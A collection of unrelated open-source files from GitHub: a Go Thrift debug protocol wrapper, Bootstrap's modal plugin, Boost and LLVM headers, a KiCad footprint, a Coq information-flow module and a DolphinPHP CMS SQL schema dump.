log.Printf("%sReadI32() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadI64() (value int64, err error) {
value, err = tdp.Delegate.ReadI64()
log.Printf("%sReadI64() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadDouble() (value float64, err error) {
value, err = tdp.Delegate.ReadDouble()
log.Printf("%sReadDouble() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadString() (value string, err error) {
value, err = tdp.Delegate.ReadString()
log.Printf("%sReadString() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadBinary() (value []byte, err error) {
value, err = tdp.Delegate.ReadBinary()
log.Printf("%sReadBinary() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) Skip(fieldType TType) (err error) {
err = tdp.Delegate.Skip(fieldType)
log.Printf("%sSkip(fieldType=%#v) (err=%#v)", tdp.LogPrefix, fieldType, err)
return
}
func (tdp *TDebugProtocol) Flush() (err error) {
err = tdp.Delegate.Flush()
log.Printf("%sFlush() (err=%#v)", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) Transport() TTransport {
return tdp.Delegate.Transport()
}
| {
"pile_set_name": "Github"
} |
var convert = require('./convert'),
func = convert('assignIn', require('../assignIn'));
func.placeholder = require('./placeholder');
module.exports = func;
| {
"pile_set_name": "Github"
} |
/* =========================================================
* bootstrap-modal.js v2.3.2
* http://getbootstrap.com/2.3.2/javascript.html#modals
* =========================================================
* Copyright 2013 Twitter, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* ========================================================= */
!function ($) {
"use strict"; // jshint ;_;
/* MODAL CLASS DEFINITION
* ====================== */
var Modal = function (element, options) {
this.options = options
this.$element = $(element)
.delegate('[data-dismiss="modal"]', 'click.dismiss.modal', $.proxy(this.hide, this))
this.options.remote && this.$element.find('.modal-body').load(this.options.remote)
}
Modal.prototype = {
constructor: Modal
, toggle: function () {
return this[!this.isShown ? 'show' : 'hide']()
}
, show: function () {
var that = this
, e = $.Event('show')
this.$element.trigger(e)
if (this.isShown || e.isDefaultPrevented()) return
this.isShown = true
this.escape()
this.backdrop(function () {
var transition = $.support.transition && that.$element.hasClass('fade')
if (!that.$element.parent().length) {
that.$element.appendTo(document.body) //don't move modals dom position
}
that.$element.show()
if (transition) {
that.$element[0].offsetWidth // force reflow
}
that.$element
.addClass('in')
.attr('aria-hidden', false)
that.enforceFocus()
transition ?
that.$element.one($.support.transition.end, function () { that.$element.focus().trigger('shown') }) :
that.$element.focus().trigger('shown')
})
}
, hide: function (e) {
e && e.preventDefault()
var that = this
e = $.Event('hide')
this.$element.trigger(e)
if (!this.isShown || e.isDefaultPrevented()) return
this.isShown = false
this.escape()
$(document).off('focusin.modal')
this.$element
.removeClass('in')
.attr('aria-hidden', true)
$.support.transition && this.$element.hasClass('fade') ?
this.hideWithTransition() :
this.hideModal()
}
, enforceFocus: function () {
var that = this
$(document).on('focusin.modal', function (e) {
if (that.$element[0] !== e.target && !that.$element.has(e.target).length) {
that.$element.focus()
}
})
}
, escape: function () {
var that = this
if (this.isShown && this.options.keyboard) {
this.$element.on('keyup.dismiss.modal', function ( e ) {
e.which == 27 && that.hide()
})
} else if (!this.isShown) {
this.$element.off('keyup.dismiss.modal')
}
}
, hideWithTransition: function () {
var that = this
, timeout = setTimeout(function () {
that.$element.off($.support.transition.end)
that.hideModal()
}, 500)
this.$element.one($.support.transition.end, function () {
clearTimeout(timeout)
that.hideModal()
})
}
, hideModal: function () {
var that = this
this.$element.hide()
this.backdrop(function () {
that.removeBackdrop()
that.$element.trigger('hidden')
})
}
, removeBackdrop: function () {
this.$backdrop && this.$backdrop.remove()
this.$backdrop = null
}
, backdrop: function (callback) {
var that = this
, animate = this.$element.hasClass('fade') ? 'fade' : ''
if (this.isShown && this.options.backdrop) {
var doAnimate = $.support.transition && animate
this.$backdrop = $('<div class="modal-backdrop ' + animate + '" />')
.appendTo(document.body)
this.$backdrop.click(
this.options.backdrop == 'static' ?
$.proxy(this.$element[0].focus, this.$element[0])
: $.proxy(this.hide, this)
)
if (doAnimate) this.$backdrop[0].offsetWidth // force reflow
this.$backdrop.addClass('in')
if (!callback) return
doAnimate ?
this.$backdrop.one($.support.transition.end, callback) :
callback()
} else if (!this.isShown && this.$backdrop) {
this.$backdrop.removeClass('in')
$.support.transition && this.$element.hasClass('fade')?
this.$backdrop.one($.support.transition.end, callback) :
callback()
} else if (callback) {
callback()
}
}
}
/* MODAL PLUGIN DEFINITION
* ======================= */
var old = $.fn.modal
$.fn.modal = function (option) {
return this.each(function () {
var $this = $(this)
, data = $this.data('modal')
, options = $.extend({}, $.fn.modal.defaults, $this.data(), typeof option == 'object' && option)
if (!data) $this.data('modal', (data = new Modal(this, options)))
if (typeof option == 'string') data[option]()
else if (options.show) data.show()
})
}
$.fn.modal.defaults = {
backdrop: true
, keyboard: true
, show: true
}
$.fn.modal.Constructor = Modal
/* MODAL NO CONFLICT
* ================= */
$.fn.modal.noConflict = function () {
$.fn.modal = old
return this
}
/* MODAL DATA-API
* ============== */
$(document).on('click.modal.data-api', '[data-toggle="modal"]', function (e) {
var $this = $(this)
, href = $this.attr('href')
, $target = $($this.attr('data-target') || (href && href.replace(/.*(?=#[^\s]+$)/, ''))) //strip for ie7
, option = $target.data('modal') ? 'toggle' : $.extend({ remote:!/#/.test(href) && href }, $target.data(), $this.data())
e.preventDefault()
$target
.modal(option)
.one('hide', function () {
$this.focus()
})
})
}(window.jQuery);
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2005-2006 Dan Marsden
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==============================================================================*/
#if !defined(BOOST_FUSION_CATEGORY_OF_IMPL_20060217_2141)
#define BOOST_FUSION_CATEGORY_OF_IMPL_20060217_2141
#include <boost/fusion/support/config.hpp>
#include <boost/fusion/support/detail/mpl_iterator_category.hpp>
#include <boost/mpl/begin_end.hpp>
#include <boost/mpl/is_sequence.hpp>
#include <boost/static_assert.hpp>
namespace boost { namespace fusion {
namespace detail
{
template <typename T>
struct mpl_sequence_category_of
{
// assumes T is an mpl sequence
// there should be no way this will ever be
// called where T is an mpl iterator
BOOST_STATIC_ASSERT(mpl::is_sequence<T>::value);
typedef typename
mpl_iterator_category<
typename mpl::begin<T>::type::category
>::type
type;
};
}
struct mpl_sequence_tag;
namespace extension
{
template<typename Tag>
struct category_of_impl;
template<>
struct category_of_impl<mpl_sequence_tag>
{
template<typename T>
struct apply
: detail::mpl_sequence_category_of<T>
{};
};
}
}}
#endif
| {
"pile_set_name": "Github"
} |
2008
2008
| {
"pile_set_name": "Github"
} |
//===- PDBStringTableBuilder.h - PDB String Table Builder -------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This file creates the "/names" stream.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_DEBUGINFO_PDB_RAW_PDBSTRINGTABLEBUILDER_H
#define LLVM_DEBUGINFO_PDB_RAW_PDBSTRINGTABLEBUILDER_H
#include "llvm/ADT/DenseMap.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/DebugInfo/CodeView/DebugStringTableSubsection.h"
#include "llvm/Support/Error.h"
#include <vector>
namespace llvm {
class BinaryStreamWriter;
class WritableBinaryStreamRef;
namespace msf {
struct MSFLayout;
}
namespace pdb {
class PDBFileBuilder;
class PDBStringTableBuilder;
struct StringTableHashTraits {
PDBStringTableBuilder *Table;
explicit StringTableHashTraits(PDBStringTableBuilder &Table);
uint32_t hashLookupKey(StringRef S) const;
StringRef storageKeyToLookupKey(uint32_t Offset) const;
uint32_t lookupKeyToStorageKey(StringRef S);
};
class PDBStringTableBuilder {
public:
// If string S does not exist in the string table, insert it.
// Returns the ID for S.
uint32_t insert(StringRef S);
uint32_t getIdForString(StringRef S) const;
StringRef getStringForId(uint32_t Id) const;
uint32_t calculateSerializedSize() const;
Error commit(BinaryStreamWriter &Writer) const;
void setStrings(const codeview::DebugStringTableSubsection &Strings);
private:
uint32_t calculateHashTableSize() const;
Error writeHeader(BinaryStreamWriter &Writer) const;
Error writeStrings(BinaryStreamWriter &Writer) const;
Error writeHashTable(BinaryStreamWriter &Writer) const;
Error writeEpilogue(BinaryStreamWriter &Writer) const;
codeview::DebugStringTableSubsection Strings;
};
} // end namespace pdb
} // end namespace llvm
#endif // LLVM_DEBUGINFO_PDB_RAW_PDBSTRINGTABLEBUILDER_H
| {
"pile_set_name": "Github"
} |
(module WSON-10-1EP_2x3mm_P0.5mm_EP0.84x2.4mm (layer F.Cu) (tedit 5A65F1FE)
(descr "WSON-10 package 2x3mm body, pitch 0.5mm, see http://www.ti.com/lit/ds/symlink/tps62177.pdf")
(tags "WSON 0.5 ")
(attr smd)
(fp_text reference REF** (at 0 -2.55) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value WSON-10-1EP_2x3mm_P0.5mm_EP0.84x2.4mm (at 0 2.55) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text user %R (at 0 0) (layer F.Fab)
(effects (font (size 0.5 0.5) (thickness 0.075)))
)
(fp_line (start 0 -1.5) (end 1 -1.5) (layer F.Fab) (width 0.15))
(fp_line (start 1 -1.5) (end 1 1.5) (layer F.Fab) (width 0.15))
(fp_line (start 1 1.5) (end -1 1.5) (layer F.Fab) (width 0.15))
(fp_line (start -1 1.5) (end -1 -0.5) (layer F.Fab) (width 0.15))
(fp_line (start -1 -0.5) (end 0 -1.5) (layer F.Fab) (width 0.15))
(fp_line (start -1.55 -1.8) (end -1.55 1.8) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.55 -1.8) (end 1.55 1.8) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.55 -1.8) (end 1.55 -1.8) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.55 1.8) (end 1.55 1.8) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.575 1.625) (end 0.575 1.625) (layer F.SilkS) (width 0.15))
(fp_line (start -1.35 -1.625) (end 0.575 -1.625) (layer F.SilkS) (width 0.15))
(pad 1 smd rect (at -0.95 -1) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 2 smd rect (at -0.95 -0.5) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 3 smd rect (at -0.95 0) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 4 smd rect (at -0.95 0.5) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 5 smd rect (at -0.95 1) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 6 smd rect (at 0.95 1) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 7 smd rect (at 0.95 0.5) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 8 smd rect (at 0.95 0) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 9 smd rect (at 0.95 -0.5) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 10 smd rect (at 0.95 -1) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad "" smd rect (at 0 0.8) (size 0.65 0.61) (layers F.Paste))
(pad 11 smd rect (at 0 0) (size 0.84 2.4) (layers F.Cu F.Mask))
(pad "" smd rect (at 0 0) (size 0.65 0.61) (layers F.Paste))
(pad "" smd rect (at 0 -0.8) (size 0.65 0.61) (layers F.Paste))
(model ${KISYS3DMOD}/Package_SON.3dshapes/WSON-10-1EP_2x3mm_P0.5mm_EP0.84x2.4mm.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
| {
"pile_set_name": "Github"
} |
From QuickChick Require Import QuickChick.
Require Import ZArith.
Require Import List.
From QuickChick.ifcbasic Require Import Machine.
Fixpoint forallb2 {A : Type} (f : A -> A -> bool) (l1 l2 :list A) : bool :=
match l1, l2 with
| nil, nil => true
| cons h1 t1, cons h2 t2 => f h1 h2 && forallb2 f t1 t2
| _, _ => false
end.
(* Indistinguishability type class *)
Class Indist (A : Type) : Type :=
{
indist : A -> A -> bool
}.
Instance indist_atom : Indist Atom :=
{|
indist a1 a2 :=
let '(x1@l1) := a1 in
let '(x2@l2) := a2 in
match l1, l2 with
| L, L => Z.eqb x1 x2
| H, H => true
| _, _ => false
end
|}.
Instance indist_mem : Indist Mem :=
{|
indist m1 m2 := forallb2 indist m1 m2
|}.
Fixpoint cropTop (s:Stack) : Stack :=
match s with
| Mty => Mty
| x::s' => cropTop s'
| (x@H:::s') => cropTop s'
| (_@L:::_) => s
end.
(* Assumes stacks have been cropTopped! *)
Instance indist_stack : Indist Stack :=
{|
indist s1 s2 :=
let fix aux s1 s2 :=
match s1, s2 with
| a1::s1', a2::s2' => indist a1 a2 && aux s1' s2'
| a1:::s1', a2:::s2' => indist a1 a2 && aux s1' s2'
| Mty, Mty => true
| _, _ => false
end
in aux s1 s2
|}.
Instance indist_state : Indist State :=
{|
indist st1 st2 :=
let '(St imem1 mem1 stk1 pc1) := st1 in
let '(St imem2 mem2 stk2 pc2) := st2 in
if negb (indist mem1 mem2) then (* trace "Memory" *) false
else if negb (indist pc1 pc2) then (* trace "PC" *) false
else let (stk1',stk2') :=
match pc1 with
| _ @ H => (cropTop stk1, cropTop stk2)
| _ => (stk1, stk2)
end in
if negb (indist stk1' stk2') then (* trace "Stack" *) false
else true
|}.
| {
"pile_set_name": "Github"
} |
-- -----------------------------
-- 导出时间 `2016-12-13 22:26:46`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_advert`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_advert`;
CREATE TABLE `dp_cms_advert` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`typeid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '分类id',
`tagname` varchar(30) NOT NULL DEFAULT '' COMMENT '广告位标识',
`ad_type` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '广告类型',
`timeset` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '时间限制:0-永不过期,1-在设内时间内有效',
`start_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '开始时间',
`end_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '结束时间',
`name` varchar(60) NOT NULL DEFAULT '' COMMENT '广告位名称',
`content` text NOT NULL COMMENT '广告内容',
`expcontent` text NOT NULL COMMENT '过期显示内容',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='广告表';
-- -----------------------------
-- 表数据 `dp_cms_advert`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_advert_type`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_advert_type`;
CREATE TABLE `dp_cms_advert_type` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(32) NOT NULL DEFAULT '' COMMENT '分类名称',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='广告分类表';
-- -----------------------------
-- 表数据 `dp_cms_advert_type`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_column`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_column`;
CREATE TABLE `dp_cms_column` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`pid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '父级id',
`name` varchar(32) NOT NULL DEFAULT '' COMMENT '栏目名称',
`model` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '文档模型id',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '链接',
`target` varchar(16) NOT NULL DEFAULT '_self' COMMENT '链接打开方式',
`content` text NOT NULL COMMENT '内容',
`icon` varchar(64) NOT NULL DEFAULT '' COMMENT '字体图标',
`index_template` varchar(32) NOT NULL DEFAULT '' COMMENT '封面模板',
`list_template` varchar(32) NOT NULL DEFAULT '' COMMENT '列表页模板',
`detail_template` varchar(32) NOT NULL DEFAULT '' COMMENT '详情页模板',
`post_auth` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '投稿权限',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
`hide` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '是否隐藏',
`rank_auth` int(11) NOT NULL DEFAULT '0' COMMENT '浏览权限,-1待审核,0为开放浏览,大于0则为对应的用户角色id',
`type` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '栏目属性:0-最终列表栏目,1-外部链接,2-频道封面',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='栏目表';
-- -----------------------------
-- 表数据 `dp_cms_column`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_document`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_document`;
CREATE TABLE `dp_cms_document` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`cid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '栏目id',
`model` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '文档模型ID',
`title` varchar(256) NOT NULL DEFAULT '' COMMENT '标题',
`shorttitle` varchar(32) NOT NULL DEFAULT '' COMMENT '简略标题',
`uid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '用户ID',
`flag` set('j','p','b','s','a','f','c','h') DEFAULT NULL COMMENT '自定义属性',
`view` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '阅读量',
`comment` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '评论数',
`good` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '点赞数',
`bad` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '踩数',
`mark` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '收藏数量',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
`trash` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '回收站',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='文档基础表';
-- -----------------------------
-- 表数据 `dp_cms_document`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_field`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_field`;
CREATE TABLE `dp_cms_field` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '字段名称',
`name` varchar(32) NOT NULL,
`title` varchar(32) NOT NULL DEFAULT '' COMMENT '字段标题',
`type` varchar(32) NOT NULL DEFAULT '' COMMENT '字段类型',
`define` varchar(128) NOT NULL DEFAULT '' COMMENT '字段定义',
`value` text NULL COMMENT '默认值',
`options` text NULL COMMENT '额外选项',
`tips` varchar(256) NOT NULL DEFAULT '' COMMENT '提示说明',
`fixed` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '是否为固定字段',
`show` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '是否显示',
`model` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '所属文档模型id',
`ajax_url` varchar(256) NOT NULL DEFAULT '' COMMENT '联动下拉框ajax地址',
`next_items` varchar(256) NOT NULL DEFAULT '' COMMENT '联动下拉框的下级下拉框名,多个以逗号隔开',
`param` varchar(32) NOT NULL DEFAULT '' COMMENT '联动下拉框请求参数名',
`format` varchar(32) NOT NULL DEFAULT '' COMMENT '格式,用于格式文本',
`table` varchar(32) NOT NULL DEFAULT '' COMMENT '表名,只用于快速联动类型',
`level` tinyint(2) unsigned NOT NULL DEFAULT '2' COMMENT '联动级别,只用于快速联动类型',
`key` varchar(32) NOT NULL DEFAULT '' COMMENT '键字段,只用于快速联动类型',
`option` varchar(32) NOT NULL DEFAULT '' COMMENT '值字段,只用于快速联动类型',
`pid` varchar(32) NOT NULL DEFAULT '' COMMENT '父级id字段,只用于快速联动类型',
`ak` varchar(32) NOT NULL DEFAULT '' COMMENT '百度地图appkey',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8 COMMENT='文档字段表';
-- -----------------------------
-- 表数据 `dp_cms_field`
-- -----------------------------
INSERT INTO `dp_cms_field` VALUES ('1', 'id', 'ID', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', 'ID', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480562978', '1480562978', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('2', 'cid', '栏目', 'select', 'int(11) UNSIGNED NOT NULL', '0', '', '请选择所属栏目', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480562978', '1480562978', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('3', 'uid', '用户ID', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563110', '1480563110', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('4', 'model', '模型ID', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563110', '1480563110', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('5', 'title', '标题', 'text', 'varchar(128) NOT NULL', '', '', '文档标题', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480575844', '1480576134', '1', '1');
INSERT INTO `dp_cms_field` VALUES ('6', 'shorttitle', '简略标题', 'text', 'varchar(32) NOT NULL', '', '', '简略标题', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480575844', '1480576134', '1', '1');
INSERT INTO `dp_cms_field` VALUES ('7', 'flag', '自定义属性', 'checkbox', 'set(\'j\',\'p\',\'b\',\'s\',\'a\',\'f\',\'h\',\'c\') NULL DEFAULT NULL', '', 'j:跳转\r\np:图片\r\nb:加粗\r\ns:滚动\r\na:特荐\r\nf:幻灯\r\nh:头条\r\nc:推荐', '自定义属性', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480671258', '1480671258', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('8', 'view', '阅读量', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480563149', '1480563149', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('9', 'comment', '评论数', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563189', '1480563189', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('10', 'good', '点赞数', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563279', '1480563279', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('11', 'bad', '踩数', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563330', '1480563330', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('12', 'mark', '收藏数量', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563372', '1480563372', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('13', 'create_time', '创建时间', 'datetime', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563406', '1480563406', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('14', 'update_time', '更新时间', 'datetime', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563432', '1480563432', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('15', 'sort', '排序', 'text', 'int(11) NOT NULL', '100', '', '', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480563510', '1480563510', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('16', 'status', '状态', 'radio', 'tinyint(2) UNSIGNED NOT NULL', '1', '0:禁用\r\n1:启用', '', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480563576', '1480563576', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('17', 'trash', '回收站', 'text', 'tinyint(2) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563576', '1480563576', '100', '1');
-- -----------------------------
-- 表结构 `dp_cms_link`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_link`;
CREATE TABLE `dp_cms_link` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`type` tinyint(2) unsigned NOT NULL DEFAULT '1' COMMENT '类型:1-文字链接,2-图片链接',
`title` varchar(128) NOT NULL DEFAULT '' COMMENT '链接标题',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '链接地址',
`logo` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '链接LOGO',
`contact` varchar(255) NOT NULL DEFAULT '' COMMENT '联系方式',
`sort` int(11) NOT NULL DEFAULT '100',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='有钱链接表';
-- -----------------------------
-- 表数据 `dp_cms_link`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_menu`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_menu`;
CREATE TABLE `dp_cms_menu` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`nid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '导航id',
`pid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '父级id',
`column` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '栏目id',
`page` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '单页id',
`type` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '类型:0-栏目链接,1-单页链接,2-自定义链接',
`title` varchar(128) NOT NULL DEFAULT '' COMMENT '菜单标题',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '链接',
`css` varchar(64) NOT NULL DEFAULT '' COMMENT 'css类',
`rel` varchar(64) NOT NULL DEFAULT '' COMMENT '链接关系网',
`target` varchar(16) NOT NULL DEFAULT '' COMMENT '打开方式',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='菜单表';
-- -----------------------------
-- 表数据 `dp_cms_menu`
-- -----------------------------
INSERT INTO `dp_cms_menu` VALUES ('1', '1', '0', '0', '0', '2', '首页', 'cms/index/index', '', '', '_self', '1492345605', '1492345605', '100', '1');
INSERT INTO `dp_cms_menu` VALUES ('2', '2', '0', '0', '0', '2', '关于我们', 'http://www.dolphinphp.com', '', '', '_self', '1492346763', '1492346763', '100', '1');
INSERT INTO `dp_cms_menu` VALUES ('3', '3', '0', '0', '0', '2', '开发文档', 'http://www.kancloud.cn/ming5112/dolphinphp', '', '', '_self', '1492346812', '1492346812', '100', '1');
INSERT INTO `dp_cms_menu` VALUES ('4', '3', '0', '0', '0', '2', '开发者社区', 'http://bbs.dolphinphp.com/', '', '', '_self', '1492346832', '1492346832', '100', '1');
INSERT INTO `dp_cms_menu` VALUES ('5', '1', '0', '0', '0', '2', '二级菜单', 'http://www.dolphinphp.com', '', '', '_self', '1492347372', '1492347510', '100', '1');
